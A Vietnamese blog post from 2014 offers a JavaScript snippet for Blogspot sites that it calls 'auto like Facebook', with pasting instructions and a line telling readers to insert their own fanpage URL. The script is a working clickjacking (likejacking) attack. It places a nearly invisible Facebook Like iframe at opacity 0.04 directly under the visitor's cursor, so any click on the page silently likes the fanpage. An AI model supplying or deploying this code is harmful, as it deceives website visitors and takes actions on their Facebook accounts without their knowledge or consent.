19:36 - 25/12/2014

Code JS auto like facebook cho Website Blogspot

  Hướng dẫn thủ thuật tạo Auto Like Facebook cho Website, bạn đã bao giờ nghĩ tới vấn này chưa? Bài viết này ThaiAiTi.com sẽ chia sẻ cho bạn nhằm tăng Like fb cho fanpage của bạn. Với code này bạn hoàn toàn dễ dàng tích hợp vào Website của bạn.

  Code JS auto like facebook cho Website Blogspot

  Cách thực hiện:
  (Dành cho người thiết kế Blogspot chuyên nghiệp)
  Chèn đoạn code sau trên </body>
  <script>var fan_page_url = 'https://www.facebook.com/designblogspot'var opacity =0.04;var time = 15000;</script><script>if((document.getElementById) && window.addEventListener || window.attachEvent){    (function(){        var hairCol = "#ff0000";
          var d = document;        var my = -10;        var mx = -10;        var r;        var vert = "";
          var idx = document.getElementsByTagName('div').length;
          var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&amp;layout=standard&amp;show_faces=true&amp;width=80&amp;action=like&amp;colorscheme=light&amp;height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";        var like;        var faceLike=getCookie("faceLike");        if (faceLike!=null && faceLike!="")        {                         }        else        {            setCookie("faceLike",'liked',1);            document.write(thehairs);            like = document.getElementById("theiframe");            document.getElementsByTagName('body')[0].appendChild(like);        }        var pix = "px";        var domWw = (typeof window.innerWidth == "number");        var domSy = (typeof window.pageYOffset == "number");      
          if (domWw)            r = window;        else{            if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)                r = d.documentElement;            else{                if (d.body && typeof d.body.clientWidth == "number")                    r = d.body;            }        }
                if(time != 0){            setTimeout(function(){                        document.getElementsByTagName('body')[0].removeChild(like);
                          if (window.addEventListener){                            document.removeEventListener("mousemove",mouse,false);                        }                        else if (window.attachEvent){                            document.detachEvent("onmousemove",mouse);                        }                    }, time);        }
          function scrl(yx){            var y,x;            if (domSy){                y = r.pageYOffset;                x = r.pageXOffset;            }            else{                y = r.scrollTop;                x = r.scrollLeft;            }            return (yx == 0) ? y:x;        }
          function mouse(e){            var msy = (domSy)?window.pageYOffset:0;            if (!e)                e = window.event;             if (typeof e.pageY == 'number'){                my = e.pageY - 15 - msy;                mx = e.pageX - 34;            }            else{                my = e.clientY - 16 - msy;                mx = e.clientX - 36;            }            vert.top = my + scrl(0) + pix;            vert.left = mx + pix;        }
          function ani(){            vert.top = my + scrl(0) + pix;            setTimeout(ani, 300);        }

          function init(){            vert = document.getElementById("theiframe").style;            ani();        }        function getCookie(c_name)        {        var c_value = document.cookie;        var c_start = c_value.indexOf(" " + c_name + "=");        if (c_start == -1)        {        c_start = c_value.indexOf(c_name + "=");        }        if (c_start == -1)        {        c_value = null;        }        else        {        c_start = c_value.indexOf("=", c_start) + 1;        var c_end = c_value.indexOf(";", c_start);        if (c_end == -1)        {        c_end = c_value.length;        }        c_value = unescape(c_value.substring(c_start,c_end));        }        return c_value;        }
          function setCookie(c_name,value,exdays)        {        var exdate=new Date();        exdate.setDate(exdate.getDate() + exdays);        var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());        document.cookie=c_name + "=" + c_value;        }
          function checkCookie()        {        var faceLike=getCookie("faceLike");        if (faceLike!=null && faceLike!="")          {                  alert("Welcome again " + faceLike);                  }        else          {            setCookie("faceLike",'liked',1);          }        }                    if (window.addEventListener){            window.addEventListener("load",init,false);            document.addEventListener("mousemove",mouse,false);        }        else if (window.attachEvent){            window.attachEvent("onload",init);            document.attachEvent("onmousemove",mouse);        }
      })();}//End</script>
  Chú ý: Thay đoạn code chữ đậm màu đỏ ở trên thành link fanpage của bạn
  * Chúc bạn thành công , mọi thắc mắc vui lòng để lại comment phía dưới.

Bình luận & Góp ý

1 nhận xét:

Đăng nhận xét